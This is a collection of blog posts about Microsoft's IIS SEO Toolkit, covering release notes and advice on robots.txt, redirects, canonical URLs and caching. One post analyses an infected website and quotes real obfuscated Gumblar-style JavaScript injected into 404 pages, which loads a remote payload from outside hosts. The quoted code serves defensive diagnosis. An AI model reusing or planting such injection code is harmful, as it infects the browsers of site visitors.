• CarlosAg Blog

    IIS Search Engine Optimization (SEO) Toolkit – Announcing Beta 2


    Yesterday we released the Beta 2 version of the IIS Search Engine Optimization (SEO) Toolkit. This version builds upon Beta 1 adding a set of new features and several bug fixes reported through the SEO forum:

    1. Report Comparison. Now you have the ability to compare two reports and track a lot of different metrics that changed in between such as New and Removed URLs, Changed and Unchanged URLs, Violations Fixed and new Violations introduced. You can also compare side-by-side the details as well as the contents to see exactly what changed both in markup, headers, or anywhere. This feature will allow you to easily keep track of changes on your Web site. More on this feature in a future blog.
    2. Authentication Support. Now you can crawl Web sites that have secured content through both Basic and Windows Authentication. This was a feature required to be able to crawl Intranet sites as well as certain staging environments that are protected by credentials.
    3. Extensibility.
      1. Developers can now extend the crawling process by providing custom modules that can parse new content types or add new violations.
      2. Developers can also provide additional set of tasks for the User Interface to expose additional features in the Site Analyzer UI as well as the Sitemaps UI.
    4. Canonical Link Support. The crawler now understands Canonical Links (rel="canonical") and contains a new set of violations to detect 5 common mistakes such as invalid use, incorrect domains, etc. The User Interface has also been extended to leverage this concept, so you can generate queries using the "Canonical URL" field, and the Sitemaps User Interface has been extended to filter in a better way those URLs that are not Canonical. For more information on canonical links see:
    5. Export. Now there are three new menu items to "Export all Violations", "Export all URLs" and "Export all Links". They get saved in a CSV (comma-separated-value) format that can easily be opened with Excel or any other Spreadsheet program (or even notepad). Log Parser is another tool that can be used to issue SQL queries to it.
    6. Open Source Files and Directories. To facilitate the fixing of violations now when you crawl the content locally you will get a context menu to open the file or the directory where it is contained in the pre-configured editor with a single click.
    7. Usability feedback. We did tons of changes in the User interface to try to simplify workflows and discovery of features based on usability feedback we had.
      1. Now we have a Start Menu Program to open the feature directly (IIS Search Engine Optimization (SEO) Toolkit).
      2. New Search Engine Optimization Page. Now all the features are surfaced directly from a single page as well as common tasks and the most recently used content within them so that with a single click you get into what you need.
      3. Query Builder updates, better UI for aggregation, auto-suggest for some fields, and better/cleaner display in general.
      4. Automatically start common tasks as part of a workflow.
      5. Less use of Tabs. We learned users felt uncomfortable getting multiple Tabs opened such as when "drilling-down" from a Violations query to see the details. In this version the "drilling-down" happens on a popup dialog to facilitate navigation and preserve context on where you were before. We also kept the option to open them in Tabs by using the "Open Group in New Query" context menu option for those that actually liked that.
      6. Added a new Violations Tag in the details dialog to facilitate fixing page-by-page from the Details Dialog.
      7. New grouping by start time in the reports page.
      8. Many more…
    8. Many bug fixes such as Fixes for CSS parsing (Comments, URL detection, etc), URL Resolution for relative URLs, Remove noise for violations in redirects, better parsing of CSS styles inside HTML, Fixes for HTML to Text conversion, better handling of storage of cached files, fixed format for dates in sitemaps, better bi-directional rendering and Right-to-Left, etc.
    9. Flag status codes 400-600 as broken links.
    10. Robots now can open the robots.txt file and fixed a couple of processing issues.
    11. Sitemaps has better filtering and handling of canonical URLs
    12. Many more

    This version can upgrade Beta 1 version and is fully compatible (i.e. your reports continue to work with the new version) so go ahead and try it and PLEASE provide us with feedback at the SEO Forum in the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    SEO Tip - Beware of the Login pages - add them to Robots Exclusion


    A lot of sites today have the ability for users to sign in to show them some sort of personalized content, whether its a forum, a news reader, or some e-commerce application. To simplify their users life they usually want to give them the ability to log on from any page of the Site they are currently looking at. Similarly, in an effort to keep a simple navigation for users Web Sites usually generate dynamic links to have a way to go back to the page where they were before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

    If your site has a login page you should definitely consider adding it to the Robots Exclusion list since that is a good example of the things you do not want a search engine crawler to spend their time on. Remember you have a limited amount of time and you really want them to focus on what is important in your site.

    Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

    Another big reason is because having this kind of URL's that vary depending on each page means there will be hundreds of variations that crawlers will need to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, etc, so it basically means you just increased the work for the crawler by two-fold. And even worst, in some cases if you are not careful you can easily cause an infinite loop for them when you add the same "login-link" in the actual login page since you get /login?returnUrl=login as the link and then when you click that you get /login?returnUrl=login?returnUrl=login... and so on with an ever changing URL for each page on your site. Note that this is not hypothetical this is actually a real example from a few famous Web sites (which I will not disclose). Of course crawlers will not infinitely crawl your Web site and they are not that silly and will stop after looking at the same resource /login for a few hundred times, but this means you are just reducing the time of them looking at what really matters to your users.

    IIS SEO Toolkit

    If you use the IIS SEO Toolkit it will detect the condition when the same resource (like login.aspx) is being used too many times (and only varying the Query String) and will give you a violation error like: Resource is used too many times.


    So how do I fix this?

    There are a few fixes, but by far the best thing to do is just add the login page to the Robots Exclusion protocol.

    1. Add the URL to the /robots.txt, you can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop a file with something like:
      User-agent: *
      Disallow: /login
    2. Alternatively (or additionally)  you can add a rel attribute with the nofollow value to tell them not to even try. Something like:
      <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
    3. Finally make sure to use the Site Analysis feature in the IIS SEO Toolkit to make sure you don't have this kind of behavior. It will automatically flag a violation when it identifies that the same "page" (with different Query String) has already been visited over 500 times.


    To summarize always add the login page to the robots exclusion protocol file, otherwise you will end up:

    1. sacrificing valuable "search engine crawling time" in your site.
    2. spending unnecessary bandwidth and server resources.
    3. potentially even blocking crawlsers from your content.
  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit


    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.


    I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

    Gumblar and Malware on sight


    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

    <TITLE>404 Not Found</TITLE>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
    <H1>Not Found</H1>
    The requested document was not found on this server.
    Web Server at **********

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

    var a = "ScriptEngine", 
    b = "Version()+", 
    j = "", 
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
    zrvzts = "A"; 
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
    document.write("<script src=//" + j + "><\/script>"); 


    var a="ScriptEngine",
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//"+j+"><\/script>");

    Notice how both of them end up writing the actual malware script living in and

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

    Case Closed

    Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    expression field="FileContents" operator="Contains" value="unescape" />
    expression field="FileContents" operator="Contains" value="eval" />
    <field name="URL" />
    field name="StatusCode" />
    field name="Title" />
    field name="Description" />
  • CarlosAg Blog

    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests


    The other day somebody ask me if there was a way to limit the amount of work that Site Analysis in IIS SEO Toolkit would cause to the server. This is interesting for a couple of reasons,

    • You might want to reduce the load that Site Analysis cause to your server at any given time
    • You might have a Denial-of-service detection system such as our Dynamic IP Restrictions IIS module that will start failing requests based on number of requests in a certain amount of time
    • Or If you like me have to go through a Proxy and it has a configured limit of number of requests per minute you are allowed to issue

    In Beta 1 we do not support the Crawl-delay directive in the Robots exclusion protocol; in future versions we will look at adding support this setting. The good news is that in Beta 1 we do have a configurable setting that can help you achieve this goals called Maximum Number of Concurrent Requests that you can configure.

    To set it:

    1. Go to the Site Analysis Reports page
    2. Select the option "Edit Feature Settings..." as show in the next image
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
  • CarlosAg Blog

    Redirects, 301, 302 and IIS SEO Toolkit


    In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily, Redirects are an important tool for Web sites and if used in the right context they actually are a required tool. But first a bit of background.

    What is a Redirect?

    A redirect in simple terms is a way for the server to indicate to a client (typically a browser) that a resource has moved and they do this by the use of an HTTP status code and a HTTP location header. There are different types of redirects but the most common ones used are:

    • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
    • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

    Below is an example on the response sent from the server when requesting

    HTTP/1.1 302 Found
    Connection: Keep-Alive
    Content-Length: 161
    Content-Type: text/html; charset=utf-8
    Date: Wed, 10 Jun 2009 17:04:09 GMT
    Location: /sqlserver/2008/en/us/default.aspx
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET


    So what do redirects mean for SEO?

    One of the most important factors in SEO is the concept called organic linking, in simple words it means that your page gets extra points for every link that external Web sites have linking to your page. So now imagine the Search Engine Bot is crawling an external Web site and finds a link pointing to your page ( and when it tries to visit your page it runs into a redirect to another location (say Now the Search Engine has to decide if it should add the original "some-page" into its index as well as if it should "add the extra points" to the new location or to the original location, or if it should just ignore it entirely. Well the answer is not that simple, but a simplification of it could be:

    • if you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently so that all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), and that it should add all the "extra points" to it, as well as any further references to the original location should now be "treated" as if it was the new one.
    • if you return a 302 (Temporary Redirect) the answer can depend on search engines, but its likely to decide to index the original location and ignore the new location at all (unless directly linked in other places) since its only temporary and it could at any given point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous on how to deal with the "extra points" and likely will be added to the original location and not the new destination.


    Enter IIS SEO Toolkit

    IIS Search Optimization Toolkit has a couple of rules that look for different patterns related to Redirects. The Beta version includes the following:

    1. The redirection did not include a location header. Believe it or not there are a couple of applications out there that does not generate a location header which completely breaks the model of redirection. So if your application is one of them, it will let you know.
    2. The redirection response results in another redirection. In this case it detected that your page (A) is linking to another page (B) which caused a redirection to another page (C) which resulted in another redirection to yet another page (D). In this case it is trying to let you know that the number of redirects could significantly impact the SEO "bonus points" since the organic linking could be all broken by this jumping around and that you should consider just linking from (A) to (D) or whatever actual end page is supposed to be the final destination.
    3. The page contains unnecessary redirects. In this case it detected that your page (A) is linking to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as when tracking page impressions, or login pages, etc. but in many cases you do not need them since we detect that you own the three pages we are suggesting to look and see if it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
    4. The page uses a refresh definition instead of using redirection. Finally related to redirection, IIS SEO will flag when it detects that the use of the refresh meta-tag is being used as a mean for causing a redirection. This is a practice that is not recommended since the use of this tag does not include any semantics for search engines on how to process the content and in many cases is actually consider to be a tactic to confuse search engines, but I won't go there.

    So how does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).


    Notice that when you double click the violations it will tell you the details as well as give you direct access to the related URL's so that you can look at the content and all the relevant information about them to make the decision. From that menu you can also look at which other pages are linking to the different pages involved as well as launch it in the browser if needed.


    Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

    IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way, just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP Status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 kb (Note that I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of spending in bandwidth). You can double click any of those rows and it will show you the details of the URL's that returned that and from there you can see who links to them, etc.


    So what should I do?

    1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
    2. Try to minimize redirections. If possible with the knowledge gain on 1, make sure to look for places where you can update your content to reduce the number of redirects.
    3. Use the right redirect. Understand what is the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary). Whenever possible prefer Permanent Redirects 301.
    4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules using both regular expressions and wildcards that live along with your application (no-administrative privileges required) that can let you set the right redirection status code. A must for SEO. More on this on a future blog.


    So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily, they are an important tool used by Web application for many reasons such as:

    • Canonicalization. Ensure that users are accessing your site with www. or without www. use permanent redirects
    • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
    • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
    • etc

    Just make sure you don't abuse them by having redirects to redirects, unnecessary redirects, infinite loops, and use the right semantics.

  • CarlosAg Blog

    Canonical Formats and Query Strings - IIS SEO Toolkit


    Today somebody was running the IIS SEO Toolkit and using the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats.". The reason apparently is that he uses Query String parameters to pass contextual information or other information between pages. This of course yield the question: Does that mean in general query strings are bad news SEO wise?

    Well, the answer is not necessarily.

    I will start by clarifying that this violation in Site Analysis means that our algorithm detected that those two URL's look like the same content, note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

    1. Based on the fact they look like the same page Search Engines will probably choose one of them and index it as the real content and will discard the other one. The problem is that you are leaving this decision to Search Engines which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not-likely though). Or even worse they might end up indexing both of them as if they were different.
    2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that you would if this was not the case. Remember Search Engines add you "extra" points when somebody external references your page but now you'll be splitting the earnings with "two pages" instead of a single canonical form.

    Query String by themselves do not pose a terrible threat to SEO, most modern Search Engines deal OK with Query Strings, however its the organic linking and the potential abuse of Query Strings that could give you headaches.

    Remember, Search Engines should make no assumptions based on the fact it is a single "page" that serves tons of content through a single Absulte Path and the use of Query Strings. This is typical in many cases such as when using index.php, where pretty much every page on the site is served by the same resource and just using variations of Query Strings or path information.


    So what should I do?

    Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) to not index pages that have the different Query String variations that really are meant only for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and use the wildcard matching to specify to not follow any URL's that contain a '?'. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can use the Site Analysis feature to run it again and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?


    In summary, try to keep canonical formats yourself, don't leave any guesses to Search Engines cause some of them might get it wrong. There are new ways of specifying the canonical form in your markup but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though) using the new rel="canonical":

    <link rel="canonical" href="" />

    In the Beta 2 version of IIS SEO Toolkit we will support this tag and have better detection of this canonical issues. So stay tuned.

    Other ways to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the Query Strings and use more SEO friendly URL's.

  • CarlosAg Blog

    Are you caching your images and scripts? IIS SEO can tell you


    One easy way to enhance the experience of users visiting your Web site by increasing the perceived performance of navigating in your site is to reduce the number of HTTP requests that are required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into a big image, etc, but by far the simplest one of all is making sure that you cache as much as you can in the client. This will not only increase the rendering time but will also reduce load in your server and will reduce your bandwidth consumption.

    Unfortunately the different types of caches and the different ways of set it can be quite confusing and esoteric. So my recommendation is to think about one way and use that all the time, and that way is using the HTTP 1.1 Cache-Control header.

    So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache them. You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if the headers are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

    Enter Site Analysis - IIS Search Optimization Toolkit

    To figure out if your images are sending the right headers you can follow the next steps:

    1. Install the IIS Search Optimization Toolkit from
    2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
    3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
      1. Is External - Equals - False -> To only include the files that are coming from your Web site.
      2. Status code - Equals - OK -> To include only successful requests
      3. Content Type Normalized - Begines With - image/ -> To include only images
      4. Headers - Not Contains - Cache-Control: -> to include the ones does not have the cache-control header specified
      5. Headers - Not Contains - Expires: -> To include only the ones that do no have the expires header
      6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

    Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
    <expression field="IsExternal" operator="Equals" value="False" />
    expression field="StatusCode" operator="Equals" value="OK" />
    expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    expression field="Headers" operator="NotContains" value="Cache-Control:" />
    expression field="Headers" operator="NotContains" value="Expires:" />
    <field name="URL" />
    field name="ContentTypeNormalized" />
    field name="StatusCode" />

    How do I fix it?

    In IIS 7 this is trivial to fix, you can just drop a web.config file in the same directory where your images and scripts and CSS styles specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

    <?xml version="1.0" encoding="UTF-8"?>
    <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />

    You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers... or any of our API's using Managed code, JavaScript or your favorite language:

    Furthermore, using the same query above in the Query Builder you can Group by Directory and find the directories that really worth adding this. For that is just matter of clicking the "Group by" button and adding the URL-Directory to the Group by clauses. Not surprisingly in my case it flags the App_Themes directory where I store 8 images.



    Finally, what about 304's?

    One thing to note is that that even if you do not do anything most modern browsers will use conditional requests to reduce the latency if they have a copy in their cache, as an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in their cache, the browser will issue a request like this

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

    Note the use of If-Modfied-Since header which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't so the server responds with a status code 304 (Not Modified)

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

    Even though this helps you can imagine that this still requires a whole roundtrip to the server which even though will have a short response, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display correctly the page or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).


    To summarize, with IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that otherwise were tedious tasks. In this case I show how easy it is to find all the images that are not specifying any caching headers and you can do the same thing for scripts (if you add Content Type Normalized equals application/javascript)  or styles (Content Type Normalized Equals text/css). This way you can increase the performance of the rendering and reduce the overall bandwidth of your Web site.

  • CarlosAg Blog

    Announcing: IIS Search Engine Optimization Toolkit Beta 1


    Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

    The features that are included in this Beta release include:

    • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed to help you easily troubleshoot common problems such as broken links, duplicate content, keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
    • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
    • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both physical and logical (Site Analysis crawler report) view of your Site.

    Checkout the great blog about IIS SEO Toolkit by ScottGu, or this IIS SEO simple video of some of its capabilities.

    Run it in your Development, Staging, or Production Environments

    One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish to the Web and you will not need to wait for those tools or Search Engines to crawl your site to finally discover you broke things.

    For developers this means that they can now easily look at the potential impact of removing or renaming a file, easily check which files are referring to this page and which files he can remove because of only being referenced by this page.

    Run it against any Web application built on any framework running in any server

    One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running in any platform, whether its ASP.NET, PHP, or plain HTML text files running in your local IIS or on any other remote server.

    Bottom line, try it against your Web site, look at the different features and give us feedback for additional reports, options, violations, content to parse, etc, post any comments or questions at the IIS Search Engine Optimization Forum.

    The IIS SEO Toolkit documentation can be found at, but remember this is only Beta 1 so we will be adding more features and content.

    IIS Search Engine Optimization Toolkit

  • CarlosAg Blog

    IIS Manager Online Help Link gets updated


    While using IIS Manager, did you ever wondered what configuration section is this UI changing? Is there a way I could automate this using scripts or command line?

    Well, if you use IIS Manager 7.0 you might have noticed that we have a link in every page called Online Help, and if you've ever clicked it you would have noticed that it takes you to the IIS 7 Operations Guide, however you might ask yourself if it was that important to place that in every page, and the answer was that we had other reasons to add it there.

    Back then when we were designing the UI we realized we wanted to provide the best content we could have for each page and potentially be able to update it as more content was available, for that reason we added this link there. However, the content was not ready at the time and instead we pointed it to our operations guide.

    But the good news is that we are updating those links to point to their respective entry in the Configuration Reference that was recently published. This means now that in any page in IIS Manager, if you click the Online Help we will point you to the configuration section that this UI would change which will give you details about how the section look like, ways to change it using Scripts, AppCmd, etc.

    Online Help

    An interesting thing, this new routing mechanism is brought to you by our very own URL Rewrite module and a simple Rewrite Map as well as a couple of rules. If you haven't looked into it, you should definitely download it and give it a try, you'll soon realize that there are so many things you can do without writing any code that you'll love it.

  • CarlosAg Blog

    Calling Web Services from Silverlight using IIS 7.0 and ARR


    During this PDC I attended Ian's presentation about WPF and Silverlight where he demonstrated the high degree of compatibility that can be achieved between a WPF desktop application and a Silverlight application. One of the differences that he demonstrated was when your application consumed Web Services since Silverlight applications execute in a sandboxed environment they are not allowed to call random Web Services or issue HTTP requests to servers that are not the originating server, or a server that exposes a cross-domain manifest stating that it is allowed to be called by clients from that domain.

    Then he moved to show how you can work around this architectural difference by writing your own Web Service or HTTP end-point that basically gets the request from the client and using code on the server just calls the real Web Service. This way the client sees only the originating server and it allows the call to succeed, and the server can freely call the real Web Service. Funny enough while searching for a Quote Service I ran into an article from Dino Esposito in MSDN magazine  where he explains the same issue and also exposes a "Compatibility Layer" which again is just code (more than 40 lines of code) to act as proxy to call a Web Service (except he uses the JSON serializer to return the values).

    The obvious disadvantage is that this means you have to write code that only forwards the request and returns the response acting essentially as a proxy. Of course this can be very simple, but if the Web Service you are trying to call has any degree of complexity where custom types are being sent around, or if you actually need to consume several methods exposed by it, then it quickly becomes a big maintenance nightmare trying to keep them in sync when they change and having to do error handling properly, as well as dealing with differences when reporting network issues, soap exceptions, http exceptions, etc.

    So after looking at this, I immediately thought about ARR (Application Request Routing) which is a new extension for IIS 7.0 (see that you can download for free from IIS.NET for Windows 2008, that among many other things is capable of doing this kind of routing without writing a single line of code.

    This blog tries to show how easy it is to implement this using ARR. Here are the steps to try this: (below you can find the software required), note that if you are only interested in what is really new just go to 'Enter ARR' section below to see the configuration that fix the Web Service call.

    1. Create a new Silverlight Project (linked to an IIS Web Site)
      1. Launch Visual Web Developer from the Start Menu
      2. File->Open Web Site->Local IIS->Default Web Site. Click Open
      3. File->Add->New Project->Visual C#->Silverlight->Silverlight Application
      4. Name:SampleClient, Locaiton:c:\Demo,  Click OK
      5. On the "Add Silverlight Application" dialog choose the "Link this Silverlight control into an existing Web site", and choose the Web site in the combo box.
      6. This will add a SampleClientTestPage.html to your Web site which we will run to test the application.
    2. Find a Web Service to consume
      1. In my case I searched using for a Stock Quote Service which I found one at
    3. Back at our Silverlight project, add a Service Reference to the WSDL
      1. Select the SampleClient project in the Solution Explorer window
      2. Project->Add Service Reference and type in the Address and click Go
      3. Specify a friendly Namespace, in this case StockQuoteService
      4. Click OK
    4. Add a simple UI to call the Service
      1. In the Page.xaml editor type the following code inside the <UserControl></UserControl> tags:
      2.     <Grid x:Name="LayoutRoot" Background="Azure">
        <RowDefinition Height="30" />
        RowDefinition Height="*" />
